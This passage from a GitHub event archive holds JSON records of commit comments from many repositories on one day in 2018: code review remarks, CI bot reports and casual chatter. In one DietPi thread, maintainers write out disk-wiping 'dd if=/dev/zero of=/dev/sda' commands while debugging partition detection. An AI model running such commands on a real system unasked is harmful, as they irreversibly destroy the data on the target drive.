will be unable to add your credits to the documentation.\r\n> \r\n> The next line is a bit tricky and has changed over the years, \"!insertmacro LANGFILE\" wants\r\n> \r\n> 1) The .nlf filename (you don't have to get this correct, we can change it later if required) but ideally this name should be plain ASCII. It is never displayed to the user.\r\n> \r\n> 2) The English name of the language. Unicode characters are technically allowed but should not happen in practice because English is plain ASCII.\r\n> \r\n> 3) The native official name of the language, in Unicode.\r\n> \r\n> 4) The native name of the language, in ASCII. Might not be possible in all languages but try your best.\r\n> \r\n> (see French.nsh, Greek.nsh and PortugueseBR.nsh for examples)\r\n> \r\n> The rest of the strings are just translated from English. "}},"created_at":"2018-07-02T21:24:29Z"}
{"id":"7909037863","type":"CommitCommentEvent","actor":{"login":"jaydenseric"},"repo":{"name":"zeit/next.js"},"payload":{"comment":{"id":29572413,"position":11,"line":14,"path":"build/webpack/plugins/react-loadable-plugin.js","commit_id":"8e9c75cb682012b38121728952fed1892a1e2f46","created_at":"2018-07-02T21:29:13Z","updated_at":"2018-07-02T21:29:13Z","author_association":"CONTRIBUTOR","body":"Why not `.mjs`? Webpack v4 in fact prefers it."}},"created_at":"2018-07-02T21:29:13Z"}
{"id":"7909038539","type":"CommitCommentEvent","actor":{"login":"stephen-chi"},"repo":{"name":"stephen-chi/Todoay"},"payload":{"comment":{"id":29572414,"position":null,"line":null,"path":null,"commit_id":"4e6118c7e03deb97557885e0f6805fc7e61938b7","created_at":"2018-07-02T21:29:22Z","updated_at":"2018-07-02T21:29:22Z","author_association":"OWNER","body":"And add functionality for adding to do items"}},"created_at":"2018-07-02T21:29:22Z"}
{"id":"7909044065","type":"CommitCommentEvent","actor":{"login":"krunalsshah"},"repo":{"name":"electrode-io/electrode-native-manifest"},"payload":{"comment":{"id":29572424,"position":6,"line":291,"path":"manifest.json","commit_id":"b2d81e90eb3e1f78043cee51073c0e03b083d151","created_at":"2018-07-02T21:30:39Z","updated_at":"2018-07-02T21:30:39Z","author_association":"CONTRIBUTOR","body":"thanks for noticing it, upgraded to `\"react-native-image-picker@0.26.10\"`, please let us know if this works."}},"created_at":"2018-07-02T21:30:39Z"}
{"id":"7909044593","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/crowdin-maven-plugin"},"payload":{"comment":{"id":29572426,"position":403,"line":403,"path":"src/main/java/org/digitalmediaserver/crowdin/configuration/TranslationFileSet.java","commit_id":"ba4177f3419951ddb0796f305fa02cb28b13afe1","created_at":"2018-07-02T21:30:47Z","updated_at":"2018-07-02T21:30:47Z","author_association":"CONTRIBUTOR","body":"@Sami32 I'm not sure I understand what you mean. Remember that you upload a file to Crowdin that is correctly formatted in the first place (e.g. `setup_en`). Crowdin then recognized what part is the text to be translated and replaces that. The rest of the file is unchanged, so any lines starting with `!` should not be touched.\r\n\r\nIs there something I am missing?"}},"created_at":"2018-07-02T21:30:47Z"}
{"id":"7909045684","type":"CommitCommentEvent","actor":{"login":"timor"},"repo":{"name":"timor/timor-overlay"},"payload":{"comment":{"id":29572429,"position":80,"line":82,"path":"default.nix","commit_id":"f5472c9634d89f4bfc6ab8ad3a9bf2fc401a61ef","created_at":"2018-07-02T21:31:03Z","updated_at":"2018-07-02T21:31:03Z","author_association":"OWNER","body":"As far as I can tell, it does not."}},"created_at":"2018-07-02T21:31:03Z"}
{"id":"7909051119","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29572437,"position":null,"line":null,"path":null,"commit_id":"bd4f611aca774e088ad53ba67f85d93716c33205","created_at":"2018-07-02T21:32:20Z","updated_at":"2018-07-02T21:32:20Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-46](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-46).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-46-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-02T21:32:20Z"}
{"id":"7909053936","type":"CommitCommentEvent","actor":{"login":"jimmchen"},"repo":{"name":"jimmchen/summer2018classwork"},"payload":{"comment":{"id":29572443,"position":null,"line":null,"path":null,"commit_id":"1360925931accb78a5f92b75e7441acbf1f3d604","created_at":"2018-07-02T21:32:59Z","updated_at":"2018-07-02T21:32:59Z","author_association":"OWNER","body":"for homework"}},"created_at":"2018-07-02T21:32:59Z"}
{"id":"7909056995","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29572452,"position":null,"line":null,"path":null,"commit_id":"2b364271ce2f1d5418402da0d8c5bbd213267423","created_at":"2018-07-02T21:33:44Z","updated_at":"2018-07-02T21:33:44Z","author_association":"COLLABORATOR","body":"Ein Frage , welche Gerät von Xiaomi hast Du?\r\nUnd, es kommt immer darauf an wo es steht. Platz ist nicht immer gleich Platz, das ist von Gerät zu Gerät verschieden. Auf der Statuszeile ist z.B. durch Notch noch viel  weniger Platz. An anderen Stellen wieder mehr.\r\nDu kürzt viel Sätze ab (entfernst der, die, das, etc.), wo z,B. Platz ist.\r\nAngebracht/sinnvoll wäre das da wo keiner ist und wo dann dadurch z.B.\"Wied...\" steht."}},"created_at":"2018-07-02T21:33:44Z"}
{"id":"7909061555","type":"CommitCommentEvent","actor":{"login":"scottmathson-auth0"},"repo":{"name":"auth0/blog"},"payload":{"comment":{"id":29572466,"position":null,"line":null,"path":null,"commit_id":"39d630e4f426723b237aab1c2b5827ee99a77002","created_at":"2018-07-02T21:34:54Z","updated_at":"2018-07-02T21:34:54Z","author_association":"MEMBER","body":"Love it 🤘😃"}},"created_at":"2018-07-02T21:34:54Z"}
{"id":"7909062377","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29572467,"position":null,"line":null,"path":null,"commit_id":"bc0b08bbe70b267c32a6b688013fe7b4304384d8","created_at":"2018-07-02T21:35:07Z","updated_at":"2018-07-02T21:35:07Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [allenfearp](https://allenfearp-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/new-plans-faq](https://allenfearp-static-docs.pantheonsite.io/docs/new-plans-faq)\n"}},"created_at":"2018-07-02T21:35:07Z"}
{"id":"7909068528","type":"CommitCommentEvent","actor":{"login":"Dockter"},"repo":{"name":"MinecraftPortCentral/GriefPrevention"},"payload":{"comment":{"id":29572478,"position":null,"line":null,"path":null,"commit_id":"0798e06829957c7764cf64b27ecff3378ac8e046","created_at":"2018-07-02T21:36:36Z","updated_at":"2018-07-02T21:36:36Z","author_association":"CONTRIBUTOR","body":"Devil's in the details eh?"}},"created_at":"2018-07-02T21:36:36Z"}
{"id":"7909070790","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"AArnott/vs-threading"},"payload":{"comment":{"id":29572482,"position":null,"line":null,"path":null,"commit_id":"357f279e44d150d2dbc305cf81fd549f2cbaed2d","created_at":"2018-07-02T21:37:11Z","updated_at":"2018-07-02T21:37:11Z","author_association":"NONE","body":"I see.  I do notice it in the package manager output window.  For some reason nuget is restoring for a bunch of runtime-specific configurations.  Have a look at your assets file:\r\n![image](https://user-images.githubusercontent.com/8918108/42187339-8b9a0752-7e04-11e8-86ac-fd883fe26e1f.png)\r\n\r\nThat's a *ton* of extra work and extra packages downloaded...\r\n\r\n@robrelyea do you have any idea why NuGet is restoring for a bunch of RIDs mentioned nowhere in the project file?\r\n"}},"created_at":"2018-07-02T21:37:11Z"}
{"id":"7909075741","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29572492,"position":null,"line":null,"path":null,"commit_id":"8070c026ede2fba13af451f6137afd8d34af4f97","created_at":"2018-07-02T21:38:23Z","updated_at":"2018-07-02T21:38:23Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-47](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-47).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-47-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-02T21:38:23Z"}
{"id":"7909079026","type":"CommitCommentEvent","actor":{"login":"fariouche"},"repo":{"name":"fariouche/rtl8812AU"},"payload":{"comment":{"id":29572508,"position":null,"line":null,"path":null,"commit_id":"ce4d57c10d0e1bb05d8bddeb3e3a0b630b61b2ac","created_at":"2018-07-02T21:39:13Z","updated_at":"2018-07-02T21:39:13Z","author_association":"OWNER","body":"lol"}},"created_at":"2018-07-02T21:39:13Z"}
{"id":"7909085810","type":"CommitCommentEvent","actor":{"login":"MattL019"},"repo":{"name":"MattL019/hurlpic-frontend"},"payload":{"comment":{"id":29572519,"position":null,"line":null,"path":null,"commit_id":"15839088df943647a807912206d5c81c7089b8f5","created_at":"2018-07-02T21:40:53Z","updated_at":"2018-07-02T21:40:53Z","author_association":"OWNER","body":"Commit should say:\r\nAll observables now either unsubscribe manually or call .complete() "}},"created_at":"2018-07-02T21:40:53Z"}
{"id":"7909091058","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/crowdin-maven-plugin"},"payload":{"comment":{"id":29572529,"position":115,"line":152,"path":"pom.xml","commit_id":"7c6fea2fadabd115533bf7585cda6aacdf005206","created_at":"2018-07-02T21:42:09Z","updated_at":"2018-07-02T21:42:09Z","author_association":"NONE","body":"Always simple as always 😛 "}},"created_at":"2018-07-02T21:42:09Z"}
{"id":"7909091666","type":"CommitCommentEvent","actor":{"login":"rarkins"},"repo":{"name":"thc-tools/webpack-react"},"payload":{"comment":{"id":29572530,"position":13,"line":31,"path":"package.json","commit_id":"016850836a0e3f1d1e30f8cfc09cd9ebe6ec11ab","created_at":"2018-07-02T21:42:17Z","updated_at":"2018-07-02T21:42:17Z","author_association":"NONE","body":"@Hartorn according to semver spec, this doesn't actually match any of the 0.x-alpha* versions available"}},"created_at":"2018-07-02T21:42:17Z"}
{"id":"7909093337","type":"CommitCommentEvent","actor":{"login":"medied"},"repo":{"name":"ciudadanointeligente/votainteligente-portal-electoral"},"payload":{"comment":{"id":29572532,"position":null,"line":null,"path":null,"commit_id":"f4c9619105b849f99617fcf6459b344c4a4f8b91","created_at":"2018-07-02T21:42:42Z","updated_at":"2018-07-02T21:42:42Z","author_association":"NONE","body":"Que el futbol no espera"}},"created_at":"2018-07-02T21:42:42Z"}
{"id":"7909094018","type":"CommitCommentEvent","actor":{"login":"campionfellin"},"repo":{"name":"google/clasp"},"payload":{"comment":{"id":29572534,"position":null,"line":null,"path":null,"commit_id":"daa469dc6077523a1ec1082babcbe8df401cbec3","created_at":"2018-07-02T21:42:53Z","updated_at":"2018-07-02T21:42:53Z","author_association":"COLLABORATOR","body":"@grant I forgot to mention, also need to commit the new `.travis.yml` file."}},"created_at":"2018-07-02T21:42:53Z"}
{"id":"7909095702","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/crowdin-maven-plugin"},"payload":{"comment":{"id":29572536,"position":115,"line":152,"path":"pom.xml","commit_id":"7c6fea2fadabd115533bf7585cda6aacdf005206","created_at":"2018-07-02T21:43:21Z","updated_at":"2018-07-02T21:43:21Z","author_association":"CONTRIBUTOR","body":"It might not be so simple to explain, but it is in fact very simple :wink: "}},"created_at":"2018-07-02T21:43:21Z"}
{"id":"7909097932","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"AArnott/vs-threading"},"payload":{"comment":{"id":29572541,"position":null,"line":null,"path":null,"commit_id":"357f279e44d150d2dbc305cf81fd549f2cbaed2d","created_at":"2018-07-02T21:43:56Z","updated_at":"2018-07-02T21:43:56Z","author_association":"NONE","body":"I've tried to reproduce the noisy (extra RID) restore a number of different ways from the commandline and cannot.  I tried restoring the sln, no repro, deleted all project.assets.json, restored from each individual project, (deleting assets.json in between) still no repro.  It seems to be a bug in how the VS extension decides to restore the projects."}},"created_at":"2018-07-02T21:43:56Z"}
{"id":"7909098163","type":"CommitCommentEvent","actor":{"login":"AdamStelmaszczyk"},"repo":{"name":"m2q/nips2018-agent"},"payload":{"comment":{"id":29572543,"position":null,"line":null,"path":null,"commit_id":"92f0b7c216f44e589150bfbb458d981a86d6cdee","created_at":"2018-07-02T21:44:00Z","updated_at":"2018-07-02T21:44:00Z","author_association":"NONE","body":"Check out valgrind, great tool. I'm checking for mem leaks with it in every build, configuration is in .travis.yml"}},"created_at":"2018-07-02T21:44:00Z"}
{"id":"7909100368","type":"CommitCommentEvent","actor":{"login":"patrikjuvonen"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29572547,"position":null,"line":null,"path":null,"commit_id":"d28eb11fca544a57cb7906cc6bb55a50d7d55f78","created_at":"2018-07-02T21:44:33Z","updated_at":"2018-07-02T21:44:33Z","author_association":"NONE","body":"In my opinion the OOP method should be called getType rather than getShapeType. Now it's not following the same naming convention as in other classes."}},"created_at":"2018-07-02T21:44:33Z"}
{"id":"7909101753","type":"CommitCommentEvent","actor":{"login":"AdamStelmaszczyk"},"repo":{"name":"m2q/nips2018-agent"},"payload":{"comment":{"id":29572550,"position":null,"line":null,"path":null,"commit_id":"92f0b7c216f44e589150bfbb458d981a86d6cdee","created_at":"2018-07-02T21:44:56Z","updated_at":"2018-07-02T21:44:56Z","author_association":"NONE","body":"You are making good progress, keep it up :)"}},"created_at":"2018-07-02T21:44:56Z"}
{"id":"7909112636","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29572579,"position":null,"line":null,"path":null,"commit_id":"8969ce6f966d2053e3baa65a20e4ee7090efe760","created_at":"2018-07-02T21:47:48Z","updated_at":"2018-07-02T21:47:48Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2968 of 2969 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 627\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8969ce6f966d2053e3baa65a20e4ee7090efe760-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8969ce6f966d2053e3baa65a20e4ee7090efe760-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-02T21:47:48Z"}
{"id":"7909113753","type":"CommitCommentEvent","actor":{"login":"Fourdee"},"repo":{"name":"Fourdee/DietPi"},"payload":{"comment":{"id":29572581,"position":null,"line":null,"path":null,"commit_id":"2747fbeb522fa6b8fd3c707d4d84b1139f31c09e","created_at":"2018-07-02T21:48:06Z","updated_at":"2018-07-02T21:48:06Z","author_association":"OWNER","body":"@MichaIng \r\n\r\nUnbelievable, now its doing it again lol:\r\n```\r\nroot@DietPi:~# dd if=/dev/zero of=/dev/sda bs=4K count=1337\r\n1337+0 records in\r\n1337+0 records out\r\n5476352 bytes (5.5 MB, 5.2 MiB) copied, 0.0166133 s, 330 MB/s\r\n\r\nroot@DietPi:~# blkid\r\n/dev/mmcblk1p6: LABEL=\"rootfs\" UUID=\"ff313567-e9f1-5a5d-9895-3ba130b4a864\" TYPE=\"ext4\"\r\n/dev/sda1: UUID=\"05fce3b7-77da-4347-adda-e6f0cf664926\" TYPE=\"ext4\"\r\n\r\nroot@DietPi:~# partprobe /dev/sda\r\nroot@DietPi:~# blkid\r\n/dev/mmcblk1p6: LABEL=\"rootfs\" UUID=\"ff313567-e9f1-5a5d-9895-3ba130b4a864\" TYPE=\"ext4\"\r\n/dev/sda1: UUID=\"05fce3b7-77da-4347-adda-e6f0cf664926\" TYPE=\"ext4\"\r\n\r\nroot@DietPi:~# partprobe /dev/sda1\r\nroot@DietPi:~# blkid\r\n/dev/mmcblk1p6: LABEL=\"rootfs\" UUID=\"ff313567-e9f1-5a5d-9895-3ba130b4a864\" TYPE=\"ext4\"\r\n/dev/sda1: UUID=\"05fce3b7-77da-4347-adda-e6f0cf664926\" TYPE=\"ext4\"\r\n\r\nroot@DietPi:~# blkid -g\r\n\r\nroot@DietPi:~# blkid\r\n/dev/mmcblk1p6: LABEL=\"rootfs\" UUID=\"ff313567-e9f1-5a5d-9895-3ba130b4a864\" TYPE=\"ext4\"\r\n/dev/sda1: UUID=\"05fce3b7-77da-4347-adda-e6f0cf664926\" TYPE=\"ext4\"\r\n```"}},"created_at":"2018-07-02T21:48:06Z"}
{"id":"7909114077","type":"CommitCommentEvent","actor":{"login":"krasi-georgiev"},"repo":{"name":"sipian/prombench"},"payload":{"comment":{"id":29572583,"position":39,"line":24,"path":"Makefile","commit_id":"2e8f669326eda9c07e5af2a0bb3692d10586b621","created_at":"2018-07-02T21:48:11Z","updated_at":"2018-07-02T21:48:11Z","author_association":"NONE","body":"we don't need vgo anymore?"}},"created_at":"2018-07-02T21:48:11Z"}
{"id":"7909114236","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29572585,"position":null,"line":null,"path":null,"commit_id":"295395c680402978cc61f42aa0e156dd59df3b79","created_at":"2018-07-02T21:48:14Z","updated_at":"2018-07-02T21:48:14Z","author_association":"NONE","body":"Would a GL 3.0 feature set be enough for the non-OIT renderer?"}},"created_at":"2018-07-02T21:48:14Z"}
{"id":"7909115101","type":"CommitCommentEvent","actor":{"login":"jcw"},"repo":{"name":"rogerclarkmelbourne/Arduino_STM32"},"payload":{"comment":{"id":29572586,"position":null,"line":null,"path":null,"commit_id":"85eb51aacb3b6ceaf1575112cd363eb9d3a4649b","created_at":"2018-07-02T21:48:29Z","updated_at":"2018-07-02T21:48:29Z","author_association":"CONTRIBUTOR","body":"Ah yes, `while (millis() - start <= ms)` would be better, then the delay is at least `ms` milliseconds."}},"created_at":"2018-07-02T21:48:29Z"}
{"id":"7909121339","type":"CommitCommentEvent","actor":{"login":"grant"},"repo":{"name":"google/clasp"},"payload":{"comment":{"id":29572595,"position":null,"line":null,"path":null,"commit_id":"daa469dc6077523a1ec1082babcbe8df401cbec3","created_at":"2018-07-02T21:50:10Z","updated_at":"2018-07-02T21:50:10Z","author_association":"MEMBER","body":"OK, I think I added that now."}},"created_at":"2018-07-02T21:50:10Z"}
{"id":"7909122089","type":"CommitCommentEvent","actor":{"login":"vitorgt"},"repo":{"name":"PauloCarneiro99/POO-project"},"payload":{"comment":{"id":29572596,"position":null,"line":null,"path":null,"commit_id":"c3929c288cf62a64e6a56042798b912ad35e9510","created_at":"2018-07-02T21:50:21Z","updated_at":"2018-07-02T21:50:21Z","author_association":"COLLABORATOR","body":"e vetor de usuarios"}},"created_at":"2018-07-02T21:50:21Z"}
{"id":"7909126836","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29572609,"position":null,"line":null,"path":null,"commit_id":"3a3083126eb3e0f094cfd1692f2765f1656fcd7d","created_at":"2018-07-02T21:51:35Z","updated_at":"2018-07-02T21:51:35Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-child](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-child).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-child-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-02T21:51:35Z"}
{"id":"7909129395","type":"CommitCommentEvent","actor":{"login":"MichaIng"},"repo":{"name":"Fourdee/DietPi"},"payload":{"comment":{"id":29572619,"position":null,"line":null,"path":null,"commit_id":"2747fbeb522fa6b8fd3c707d4d84b1139f31c09e","created_at":"2018-07-02T21:52:16Z","updated_at":"2018-07-02T21:52:16Z","author_association":"COLLABORATOR","body":"@Fourdee \r\nDid you try without the `count=` setting?\r\njust `dd if=/dev/zero of=/dev/sda`\r\nhttps://serverfault.com/a/250846"}},"created_at":"2018-07-02T21:52:16Z"}
{"id":"7909131258","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29572626,"position":null,"line":null,"path":null,"commit_id":"8969ce6f966d2053e3baa65a20e4ee7090efe760","created_at":"2018-07-02T21:52:45Z","updated_at":"2018-07-02T21:52:45Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8969ce6f966d2053e3baa65a20e4ee7090efe760-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-02T21:52:45Z"}
{"id":"7909136012","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29572640,"position":null,"line":null,"path":null,"commit_id":"d6f7ce43e24041057716f0f64de46ba27d6fa2fb","created_at":"2018-07-02T21:54:03Z","updated_at":"2018-07-02T21:54:03Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-668](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-668).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-668-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-02T21:54:03Z"}
{"id":"7909136198","type":"CommitCommentEvent","actor":{"login":"ferbsx"},"repo":{"name":"rubymonsters/rgbapp"},"payload":{"comment":{"id":29572641,"position":null,"line":null,"path":null,"commit_id":"0ed3db967b6d7cd2a52dea4c166ae35ba1bd8bf1","created_at":"2018-07-02T21:54:06Z","updated_at":"2018-07-02T21:54:06Z","author_association":"MEMBER","body":"Great text 😊👌   "}},"created_at":"2018-07-02T21:54:06Z"}
{"id":"7909136907","type":"CommitCommentEvent","actor":{"login":"m2q"},"repo":{"name":"m2q/nips2018-agent"},"payload":{"comment":{"id":29572643,"position":null,"line":null,"path":null,"commit_id":"92f0b7c216f44e589150bfbb458d981a86d6cdee","created_at":"2018-07-02T21:54:17Z","updated_at":"2018-07-02T21:54:17Z","author_association":"OWNER","body":"Thank you very much!\r\n\r\nYup, I noticed you were using valgrind (still learning C++ hehe) so I tried it as well.\r\n\r\nSuper confusing lol. But it helped a bit "}},"created_at":"2018-07-02T21:54:17Z"}
{"id":"7909138233","type":"CommitCommentEvent","actor":{"login":"EmilChoparinov"},"repo":{"name":"EmilChoparinov/Chip-Challenge"},"payload":{"comment":{"id":29572645,"position":null,"line":null,"path":null,"commit_id":"868c731257bdec4a5bcaa5d8dc6073ab0f1a2561","created_at":"2018-07-02T21:54:39Z","updated_at":"2018-07-02T21:54:39Z","author_association":"OWNER","body":"What do you mean? Github is the most conventional platform :P"}},"created_at":"2018-07-02T21:54:39Z"}
{"id":"7909139620","type":"CommitCommentEvent","actor":{"login":"Fourdee"},"repo":{"name":"Fourdee/DietPi"},"payload":{"comment":{"id":29572652,"position":null,"line":null,"path":null,"commit_id":"2747fbeb522fa6b8fd3c707d4d84b1139f31c09e","created_at":"2018-07-02T21:55:01Z","updated_at":"2018-07-02T21:55:01Z","author_association":"OWNER","body":"@MichaIng \r\n> just dd if=/dev/zero of=/dev/sda\r\n\r\nNo, I didn't, this would take far too long on a XX+GB drive"}},"created_at":"2018-07-02T21:55:01Z"}
{"id":"7909141996","type":"CommitCommentEvent","actor":{"login":"sargun"},"repo":{"name":"Netflix/titus-executor"},"payload":{"comment":{"id":29572659,"position":12,"line":11,"path":"uploader/s3_test.go","commit_id":"cd7fabbed69566ea6e94843d26bf08d0a32153ea","created_at":"2018-07-02T21:55:38Z","updated_at":"2018-07-02T21:55:38Z","author_association":"CONTRIBUTOR","body":"hrm, I thought there was a comment to remove the underscore."}},"created_at":"2018-07-02T21:55:38Z"}
{"id":"7909148563","type":"CommitCommentEvent","actor":{"login":"Gateworks"},"repo":{"name":"Gateworks/uboot-newport"},"payload":{"comment":{"id":29572673,"position":18,"line":18,"path":"arch/arm/cpu/armv8/cvm-thunderx/lowlevel.S","commit_id":"4fcbd408dab39533c1b4b5cb837676b6de432acd","created_at":"2018-07-02T21:57:28Z","updated_at":"2018-07-02T21:57:28Z","author_association":"OWNER","body":"The BDK (acting as a secondary program loader between the BOOT ROM and U-Boot) is responsible for loading the dtb. It gets passed to the ATF which in turn loads u-boot. I don't exactly know where the address comes from - this code was written by Cavium"}},"created_at":"2018-07-02T21:57:28Z"}
{"id":"7909149060","type":"CommitCommentEvent","actor":{"login":"deanishe"},"repo":{"name":"deanishe/awgo"},"payload":{"comment":{"id":29572675,"position":39,"line":58,"path":"README.md","commit_id":"5f0051950af39371385f2dfda96483eb1423e565","created_at":"2018-07-02T21:57:36Z","updated_at":"2018-07-02T21:57:36Z","author_association":"OWNER","body":"I'm sorry, I'm just not feeling it. I'll explain my thinking and workflow-building … err … workflow, so you understand where I'm coming from. Then perhaps you can tell me why the current design should be changed.\r\n\r\nPhilosophy\r\n-----------\r\n\r\nFirst of all, I am well aware of the best practices regarding error handling. However, I made a conscious decision to prioritise convenience over correctness (in the sense of best practices). Unlike the standard library, which must be broadly useable, AwGo is intended for the specific purpose of building (the relatively trivial programs that are) Alfred workflows.\r\n\r\nI  deliberately chose the \"panic in a dodgy environment\" (including on import) route; went with `Workflow.Run(fn func())` and not `Workflow.Run(fn func(wf *Workflow) error)` (i.e. requiring a global `*aw.Workflow` instance); and reconfigured the default `log.Logger` (instead of a custom one) because it offers a lot of convenience at the cost of imposing (what I consider) reasonable requirements for fairly trivial programs.\r\n\r\nHow I build workflows\r\n----------------------\r\n\r\n[This](https://github.com/deanishe/alfred-gcal/) is the last (completed) workflow I built with AwGo, so it more or less reflects the state of my art, but it was built against an earlier version of AwGo, and needs updating to work with the current version.\r\n\r\nThe first thing I do after creating the source directory for the workflow is to create a new, empty workflow in Alfred and copy its contents to the source directory. And then delete the workflow in Alfred.\r\n\r\nAs I said before, I always use a shell to develop workflows. I always have [`modd`](https://github.com/cortesi/modd) running to [run any tests and rebuild the workflow](https://github.com/deanishe/alfred-gcal/blob/master/modd.conf) whenever I change something, and I symlink the `./build` directory to Alfred's workflow directory, so the same workflow I'm looking at in my editor and my shell is also always in Alfred.\r\n\r\nIn the shell, I source a [script that extracts the workflow variables from info.plist](https://github.com/deanishe/alfred-gcal/blob/master/alfred_env.sh)[1], so the program is using the *same paths and settings* in Alfred and the shell.\r\n\r\nThis is important because I make very heavy use of workflow variables in my workflows. Typically, I build them as command-line applications and use [Kingpin](https://github.com/alecthomas/kingpin) for the CLI interface, which allows me to automatically map environment (i.e. workflow) variables to command-line flags. I also use workflow variables to direct execution flow within Alfred.\r\n\r\nBuilding workflows this way [makes it relatively easy for users to customise the workflow](https://www.alfredforum.com/topic/10921-safari-assistant/?page=2&tab=comments#comment-59499).\r\n\r\n\r\nResult\r\n------\r\n\r\nThe upshot of all that is that my workflows don't run very well in a shell, and it's *way* easier to identify issues when running them in Alfred.\r\n\r\nThat is why I don't particularly care that AwGo dies in flames in a non-Alfred environment. I deliberately threw that under the bus for the sake of convenience because I don't view the library as having meaningful utility in such an environment.\r\n\r\nConsequently, I need a good justification for any changes that reduce convenience because convenience is the priority, not following general best practices.\r\n\r\n-----\r\n\r\n[1]:  That workflow was built with an earlier version that would fall back to calculating the data/cache paths itself from the bundle ID, That's a really bad idea, though, as it hard-codes Alfred's version in the path. That broke *a lot* of workflows when Alfred 3 came out."}},"created_at":"2018-07-02T21:57:36Z"}
{"id":"7909149577","type":"CommitCommentEvent","actor":{"login":"ConnorZimmerman"},"repo":{"name":"EmilChoparinov/Chip-Challenge"},"payload":{"comment":{"id":29572678,"position":null,"line":null,"path":null,"commit_id":"868c731257bdec4a5bcaa5d8dc6073ab0f1a2561","created_at":"2018-07-02T21:57:44Z","updated_at":"2018-07-02T21:57:44Z","author_association":"COLLABORATOR","body":"Lol, I messaged you on facebook :)\n\n\nOn Mon, Jul 2, 2018 at 2:54 PM, Emil Choparinov <notifications@github.com>\nwrote:\n\n> What do you mean? Github is the most conventional platform :P\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/EmilChoparinov/Chip-Challenge/commit/868c731257bdec4a5bcaa5d8dc6073ab0f1a2561#commitcomment-29572645>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AajGRduw-pdPvhDTtmrV2Tsu_1oAXinsks5uCpafgaJpZM4U_x6d>\n> .\n>\n>\n> ------------------------------\n>\n> This email has been scanned for spam and viruses by Proofpoint Essentials.\n> Click here\n> <https://us4.proofpointessentials.com/index01.php?mod_id=11&mod_option=logitem&mail_id=1530568486-FVfcHfhAoUd5&r_address=connor.zimmerman%40handlefin.com&report=1>\n> to report this email as spam.\n>\n>\n"}},"created_at":"2018-07-02T21:57:44Z"}
